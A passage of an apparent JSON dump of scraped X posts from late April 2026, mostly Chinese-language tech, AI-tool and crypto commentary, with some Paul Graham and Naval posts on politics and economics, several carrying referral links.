"https://x.com/Pluvio9yte/status/2049455214550565367", + "published_at": "2026-04-29T11:46:14+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Polymarket V2 cutover 24 小时观察。\n\n把十几个策略账户的 USDC.e 全部迁到 pUSD,verify + smoke PASS。一起来观察下第一天的市场反应。\n\n---\n\n【数据层】@lnkybtc 秋田老师的链上数据最直观:\n\n• V2 部署后 4 小时,pUSD 发行 1.7 亿美元,186 万笔转账,68,686 个持有地址\n• 6 小时内,PM TVL 4.5 亿里有 2 亿(40%)转成了 pUSD\n• 利息原本上交 Circle,现在 PM 自己拿——2028 大选 4% 年化补贴的资金来源问题解决了\n• 但代价是:链上协议独立性解除,pUSD 和 PM 链下信用强绑定(V1 时代你能自己 merge 回 USDC,PM 停摆也不影响)\n\n---\n\n【实操层】我自己社群(http://t.me/runesgang)24h 真实痛点:\n\n技术派:\n• \"V2 的 SDK 识别不到 pUSD\"\n• \"前端已经 pusd 了,后端 redeem 还是 usdce\"——前后端口径不一致\n• merge() 老仓位还得走 USDC.e 中转,不能直接出 pUSD\n\n困惑派:\n• \"这个 pusd 到底是干嘛的我都搞不懂了\"\n• \"非包装一层 pusd 有啥好处\"\n• \"那这 V2 升的点用没有\"\n\n少数正面:\n• \"V2 跑起来感觉好多了\"(撮合延迟、签名都顺了)\n\n---\n\n【判断】\n\n工程方向是对的(pUSD 原生化 + EIP-712 标准化 + 砍掉 nonce 攻击面),产品节奏猛了点——从公告到强制迁移 < 72h。\n\n链上数字漂亮(4 小时 1.7 亿 pUSD),社群一片懵逼(\"包一层有啥好处\"),中间差着几天工程消化期。\n\n官方有这个动作,搞策略的顺着规则走——该调整就调整,正常推进策略迭代,后续持续关注变化。\n\nhttps://polymarket.com/?r=tgpublic&via=runes-leo&utm_source=x&utm_content=v2-cutover-observation&v…", + "url": "https://x.com/runes_leo/status/2049450372285046792", + "published_at": "2026-04-29T11:27:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Anthropic ships changelogs. OpenAI ships vibes.", + "url": "https://x.com/runes_leo/status/2049438052310020226", + "published_at": "2026-04-29T10:38:03+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二,\"终端 → 开发环境平台\"这个转型挺有意思。Cursor 从编辑器起家往下卷,Warp 从终端起家往上走,两边都在做同一件事:把 IDE、终端、Agent 折叠成一个东西。\n\n第三,开放接入别人的 Agent 是聪明的一手。自己内置一套,但承认你可能更想用 Claude Code 或者 Codex。开门做,比关门打有意思。\n\n对个人开发者来说,以前的标配是 iTerm + Cursor + Claude Code 三件套来回切,现在一个 Warp 就够了。\n\nhttp://github.com/warpdotdev/warp", + "url": "https://x.com/bozhou_ai/status/2049436870963085429", + "published_at": "2026-04-29T10:33:21+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Machine Learning Part 2(Kevin Murphy):概率视角下的 ML 高级篇\nhttps://probml.github.io/pml-book/book2.html\n\n【深度学习】\n\n4. Deep Learning(Goodfellow/Bengio/Courville):业内俗称\"花书\"\nhttps://www.deeplearningbook.org/\n\n5. Understanding Deep Learning(Simon Prince):2025 新版,配 Python notebook,比花书更新更友好\nhttps://udlbook.github.io/udlbook/\n\n【强化学习】\n\n6. Reinforcement Learning: An Introduction(Sutton & Barto):RL 圣经,做 Agent 必看\nhttp://incompleteideas.net/book/the-book-2nd.html\n\n7. Distributional Reinforcement Learning:第一本系统讲分布式 RL 的教材\nhttps://www.distributional-rl.org/\n\n8. Multi-Agent Reinforcement Learning:多 Agent 协作完整入门\nhttps://www.marl-book.com/\n\n【应用与工程】\n\n9. Foundations of Computer Vision(Torralba 等):现代 CV 全景图\nhttps://visionbook.mit.edu/\n\n10. Machine Learning Systems:ML 模型的系统工程化\nhttps://mlsysbook.ai/\n\n11. Machine Learning in Production:从模型到真正的产品\nhttps://mlip-cmu.github.io/book/\n\n12. Fairness and Machine Learning:AI 公平性问题\nhttps://fairmlbook.org/\n\n啃下来需要一点数学和编程基础。如果你只是想\"了解 AI\",这些书太硬,去找科普书更合适。但要真搞懂 AI 是怎么回事的人,看这些比看 100 篇科普文章都管用。", + "url": "https://x.com/bozhou_ai/status/2049436668663390575", + "published_at": "2026-04-29T10:32:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker 该有的样子。", + "url": "https://x.com/runes_leo/status/2049423498494566836", + "published_at": "2026-04-29T09:40:13+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", + "url": "https://x.com/dingyi/status/2049423162933395583", + "published_at": "2026-04-29T09:38:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.", + "url": "https://x.com/paulg/status/2049419661855338641", + "published_at": "2026-04-29T09:24:58+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much who's president, because the country will have entered a phase of permanent decline.", + "url": "https://x.com/paulg/status/2049416736806449649", + "published_at": "2026-04-29T09:13:21+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect against Trump's overreach.", + "url": "https://x.com/paulg/status/2049416188568949159", + "published_at": "2026-04-29T09:11:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.", + "url": "https://x.com/paulg/status/2049415696694587729", + "published_at": "2026-04-29T09:09:13+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", + "url": "https://x.com/realNyarime/status/2049409325098238125", + "published_at": "2026-04-29T08:43:53+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为商务专线没有过文件只能装具体啥地方,只规定过营业执照入网。 \n然后,自从PCDN精准识别上线后,客户的宽带再也没有限速过,这次他们来核查纯粹是找疑似装在住宅区,又拉了多条网的情况。等于我们在精准识别系统里查的数据,既没有跨省PCDN流量,也没有省内PCDN流量产生。真正的一点都没有。因为跑省内PCDN的用户至少会出现8%的省际PCDN流量以及大量省内PCDN流量,事实上是客户省内省际都没有。\n那么可能有人就会问了,用网的话,不是省外就一定是省内或者市内啊,其实不是的。PCDN的重点在于Peer to peer。也就是我们常见的P2P。而客户的需求是个人电脑的素材进网店平台的录播用的。(就是你打开网购平台出现一段视频介绍,那段视频介绍就是这种机制。)。客户的素材文件直接传入企业服务器。全程没有出现数据分拆式碎片,分流到全网的个人宽带,家庭路由器,闲置主机等对用户节点互相中转共享。\n为什么主机多,显示屏少?省电,而且程序设定好的,后续是无需人工过多操作的。为什么装在住宅区?一个是房租低,另一点是住宅用电也低。而且开放的老小区,拉多条宽带更好放线(虽然商务楼宇我们也可以跳高一级分光实现)。\n另外,提醒大家,要么装电子锁,要么不要把钥匙放窗户上,这样太危险了,而且这样摸着钥匙随便进去没经过别人同意更是疑似违法的!", + "url": "https://x.com/realNyarime/status/2049408651660755063", + "published_at": "2026-04-29T08:41:13+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", + "url": "https://x.com/Pluvio9yte/status/2049403423813140571", + "published_at": "2026-04-29T08:20:26+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xiaomimimo.com\n访谈解读:https://x.com/runes_leo/status/2049371895267774715?s=20\n网页版:http://leolabs.me/blog/luofuli-agent-3to1to1", + "url": "https://x.com/runes_leo/status/2049402305217241384", + "published_at": "2026-04-29T08:16:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", + "url": "https://x.com/CuiMao/status/2049397079177592925", + "published_at": "2026-04-29T07:55:14+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "x.com/i/article/204921670329…", + "url": "https://x.com/CuiMao/status/2049394392776290573", + "published_at": "2026-04-29T07:44:33+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Elon Musk avait dit un truc qui m'avait marqué sur l'allocation de ressources. En substance : passé un certain niveau de richesse, l'argent n'est plus de la consommation, c'est de l'allocation de capital.\n\nCette phrase change tout.\n\nL'économie, dans le fond, c'est juste un problème d'allocation. Tu as des ressources finies et des usages infinis. Qui décide où va quoi ?\n\nImagine une cour de récré. 100 enfants, des paquets de cartes Pokémon distribués au hasard. Tu laisses faire. Très vite, un ordre émerge. Les bons joueurs accumulent les cartes rares, les collectionneurs trient, les négociateurs trouvent des deals. Personne n'a planifié. Et pourtant chaque carte finit dans les mains de celui qui en tire le plus de valeur. Le système maximise le bonheur total de la cour. C'est ça, la main invisible.\n\nMaintenant fais entrer la maîtresse. Elle trouve ça injuste. Léo a 50 cartes, Tom en a 3. Elle confisque, redistribue, impose l'égalité. Trois effets immédiats. Les bons joueurs arrêtent de jouer, à quoi bon. Les mauvais n'ont plus de raison de progresser, ils auront leur part. Les échanges s'effondrent. La cour est égale, et morte. Elle a maximisé l'égalité, elle a détruit le bonheur.\n\nLe problème de la maîtresse, c'est qu'elle ne peut pas avoir l'information que la cour avait collectivement. C'est le problème du calcul économique de Mises, formulé en 1920. L'URSS a essayé de le résoudre pendant 70 ans avec le Gosplan. Résultat : pénuries, queues, effondrement. Pas parce que les Soviétiques étaient bêtes, parce que le problème est mathématiquement insoluble en mode centralisé.\n\nQuand Musk a 200 milliards, il ne les consomme pas, il les alloue. SpaceX, Starlink, Neuralink, xAI. Chaque dollar est un pari sur le futur. Et lui a un track record. PayPal, Tesla, SpaceX. Il a démontré qu'il sait identifier des problèmes immenses et y allouer des ressources avec un rendement spectaculaire.\n\nL'État aussi a un track record. Hôpitaux qui s'effondrent, éducation qui décline, dette qui explose, services publics qui se dégradent malgré des budgets en hausse constante. Le marché identifie les bons allocateurs, la politique identifie les bons communicants.\n\nLe profit n'est pas une finalité, c'est un signal. Il dit : tu as alloué des ressources rares vers un usage que les gens valorisent suffisamment pour payer. Plus le profit est gros, plus la création de valeur est grande. Quand Starlink est rentable, ça veut dire que des millions de gens dans des zones rurales ont enfin internet. Quand un ministère est en déficit, ça veut dire qu'il consomme plus qu'il ne produit. L'un crée, l'autre détruit, et on appelle ça redistribution.\n\nDans nos sociétés il y a deux catégories d'acteurs. Les entrepreneurs et les bureaucrates. L'entrepreneur prend un risque personnel pour identifier un problème, mobiliser des ressources, créer une solution. S'il se trompe il perd. S'il a raison, ses clients gagnent, ses employés gagnent, ses fournisseurs gagnent, l'État collecte des impôts. Il est la cellule de base du progrès humain.\n\nLe bureaucrate ne prend aucun risque personnel. Son salaire est garanti. Au mieux il maintient une rente existante. Au pire il la détruit par excès de réglementation, mauvaise allocation forcée, incitations perverses qui découragent ceux qui produisent. Mais dans aucun cas il ne crée.\n\nRegarde les 50 dernières années. iPhone, internet civil, SpaceX, Tesla, Google, Amazon, Stripe, mRNA, ChatGPT. Toutes des inventions privées, portées par des entrepreneurs, financées par du capital risque. Pas un seul ministère n'a inventé quoi que ce soit qui ait changé ta vie au quotidien.\n\nLa France est devenue le laboratoire mondial de la dérive bureaucratique. 57% du PIB en dépenses publiques, record absolu. Une administration tentaculaire, une fiscalité qui pénalise la création de richesse. Résultat : décrochage face aux États-Unis, à l'Allemagne, à la Suisse. Fuite des cerveaux. Désindustrialisation. Dette qui explose.\n\nEt le pire c'est que la mauvaise allocation s'auto-renforce. Plus l'État prélève, moins les entrepreneurs créent. Moins ils créent, moins il y a de base fiscale. Plus l'État s'endette et taxe. Boucle de rétroaction négative parfaite. La maîtresse pense qu'elle aide, et chaque année la cour produit moins.\n\nDans nos sociétés, ce sont les entrepreneurs, toujours, qui font avancer la civilisation. Les bureaucrates au mieux maintiennent une rente, au pire la détruisent. Aucune société n'a jamais progressé en taxant ses créateurs pour subventionner ses gestionnaires.\n\nLa question n'est jamais qui a combien. C'est qui alloue le mieux la prochaine unité de ressource pour maximiser le futur de l'humanité. La réponse depuis 200 ans n'a jamais changé. Ce ne sont pas les fonctionnaires.", + "url": "https://x.com/naval/status/2049391838646182234", + "published_at": "2026-04-29T07:34:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "x.com/i/article/204902031072…", + "url": "https://x.com/runes_leo/status/2049371895267774715", + "published_at": "2026-04-29T06:15:09+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", + "url": "https://x.com/CuiMao/status/2049369313547800804", + "published_at": "2026-04-29T06:04:54+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", + "url": "https://x.com/lxfater/status/2049368609193926810", + "published_at": "2026-04-29T06:02:06+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "\"Savings Tax.\"", + "url": "https://x.com/naval/status/2049368528445403351", + "published_at": "2026-04-29T06:01:47+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火力打内容 💡\n\n这种活动本质是用内容换影响力再变现。不用每天盯着链上烧 Gas,也不用拼资金体量,持续输出好内容慢慢把排名做上去就行 ⚡ 而且 Tria 背靠 Hyperliquid 和 Aptos,近期上了永续合约和收益产品,Mindo 又是 AI 热点,两个合在一起创作素材很充裕,叙事空间够大 🎁\n\n建议想参与的创作者多结合产品最新动态做内容增量,交互上优先做一次操作长尾生效的任务,别分散精力去追全部。控制节奏,这个活动的长尾收益会比看起来更可观 👀", + "url": "https://x.com/chuxiaeth/status/2049351176433623539", + "published_at": "2026-04-29T04:52:50+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", + "url": "https://x.com/naval/status/2049349252112089553", + "published_at": "2026-04-29T04:45:11+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? 22:10\n\nThe Beginning of the End of Apple’s Dominance 24:17\n\nCoding Agents As Customer Service Reps 27:55", + "url": "https://x.com/naval/status/2049349249905951175", + "published_at": "2026-04-29T04:45:10+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我就知道🤣🤣🤣", + "url": "https://x.com/dingyi/status/2049335171066061234", + "published_at": "2026-04-29T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build amazing startups:\n\nOpenAI is not going to build a cattle-herding drone, buy an old F-150 and drive from ranch to ranch like the founder of one of the fastest-growing YC W26 startups, Graze Mate.\n\nAnthropic is not going to integrate with dental insurance verification systems (Lance).\n\nGoogle is not going to navigate NATO procurement (Milliray).\n\nThe value is in the last mile, not the model. Sales cycles require humans who understand the customer. And most importantly, the market is expanding, not shrinking: AI isn't cannibalizing the existing 1% software spend — it's unlocking the other 5-6% that was going to humans. That's a much bigger market for startups yet-to-be-founded than the one the labs are playing in.\n\nNow, what DOES seem risky?\n\nA thin UI layer on top of ChatGPT with no domain expertise; a general-purpose chatbot or assistant; or a product that gets obsolete when model capabilities improve.\n\nBut — tools for specific industries; \"full-stack\" AI companies that actually are the service (AI law firm, AI accounting firm, AI uranium exploration company); or generally products where the customer doesn't want a tool but an outcome — are defensible ideas for startups.", + "url": "https://x.com/paulg/status/2049333482271260710", + "published_at": "2026-04-29T03:42:31+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up and traced ~50% of them.\n\nFounders of ~20 unicorns and ~7 decacorns and ~10 billionaires: OpenAI, Cursor, Stripe, Databricks, Perplexity, Ethereum, Cognition, Hyperliquid, Fireworks, Modal, Quora, Parallel, Cartesia, Wispr\n\nMost kids went to MIT, a whopping 12% of them, followed by Cambridge (7%) and Sharif (3%)!\n\nThe career paths they chose (of those who graduated) were:\n— 36% Academia (professors)\n— 26% Other\n— 22% in Software / Tech\n— 12% in Quant / Finance\n— 5% Founders!\n\nThe biggest employer was Google, by far, at 6%.\nOthers interesting tidbits were:\n— 47 of them work at Jane Street (#3)\n— 38 at OpenAI (#5)\n— 15 at Anthropic\n— 8 at Cognition\n— 6 at Isomorphic Labs\n\nOlympiaders were 1500x more likely to be billionaires and 4000x more likely to be unicorn founders than the average person!", + "url": "https://x.com/paulg/status/2049330123464393084", + "published_at": "2026-04-29T03:29:10+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演示的视频,要求运镜丝滑\n\n注册体验领积分👉https://flowith.io?inv=TIECHUIREN,喜欢的可以试试", + "url": "https://x.com/lxfater/status/2049329956153352499", + "published_at": "2026-04-29T03:28:30+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https://flowith.io?inv=TIECHUIREN\n\n图片和视频提示词都在下一条👇", + "url": "https://x.com/lxfater/status/2049329950495310198", + "published_at": "2026-04-29T03:28:29+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年\n\n这条链路怎么跑起来,看我下面细细说来👇", + "url": "https://x.com/lxfater/status/2049329944052859141", + "published_at": "2026-04-29T03:28:28+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", + "url": "https://x.com/gkxspace/status/2049325117998592311", + "published_at": "2026-04-29T03:09:17+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", + "url": "https://x.com/sama/status/2049315574120055054", + "published_at": "2026-04-29T02:31:21+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Image", + "url": "https://x.com/sama/status/2049314532892475791", + "published_at": "2026-04-29T02:27:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/taker 策略我不开源。里面是 sigmaD1 校准、做市 reprice 阈值、adverse selection 的实证参数。这些东西公开出来,相当于把研究路径直接送给同行——edge 一旦 commoditize 就没了,不管原来有没有 edge。\n\n中间还有一档:方法论可以写,具体参数不能写。pm-quant 付费源码包(https://leolabs.me/pm-quant)走的就是这层——19 个策略 + 加密 zip + 1on1 部署支持。付费门槛 = 过滤同行竞争。\n\n群里有人点 gabagool 这个高手地址:5min / 15min / 小时各级别都跑赢,\"不管行情都飞起\"。他的代码不在 github。市场已经用脚投票了。\n\n所以\"开源 bot 都亏钱\"是幸存者偏差决定的——能赚钱的人没有开源动机。你看到 ⭐ 几千、全是好评、作者还在持续更新的量化仓库,多半是个披着量化外壳的内容产品:开源是吸引订阅/付费的入口,不是核心收入。\n\n工具层开源、策略层闭源、方法论可分享、参数不可分享——这条线在 PM 量化圈里其实很清晰。\n\n护城河没消失,只是从\"代码会写\"换成\"策略会想\",从\"工具\"换成\"判断\"。\n\nPM 上扒数据 / 研究地址:https://polymarket.com/?r=runesleo&via=runes-leo&utm_source=x&utm_content=opensource-bot-moat&v…", + "url": "https://x.com/runes_leo/status/2049311708330459226", + "published_at": "2026-04-29T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", + "url": "https://x.com/dingyi/status/2049304499093946475", + "published_at": "2026-04-29T01:47:21+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", + "url": "https://x.com/gkxspace/status/2049302176900501544", + "published_at": "2026-04-29T01:38:07+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: 看到一个面向 Design Engineer 的 UI Skills 集合站\n\n不过与其说是面向 Design Engineer,更像是面向有 UI/UX,甚至 Remotion 等跟设计、展示、交互、动画相关的设计师和开发者们的。\n\n如果你在找 UI/UX/Remotion/Motion Graphics 等相关 Skills,这个网站可以看看:\nhttps://www.ui-skills.com/skills/", + "url": "https://x.com/GoSailGlobal/status/2049301758036549775", + "published_at": "2026-04-29T01:36:27+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest in cash so 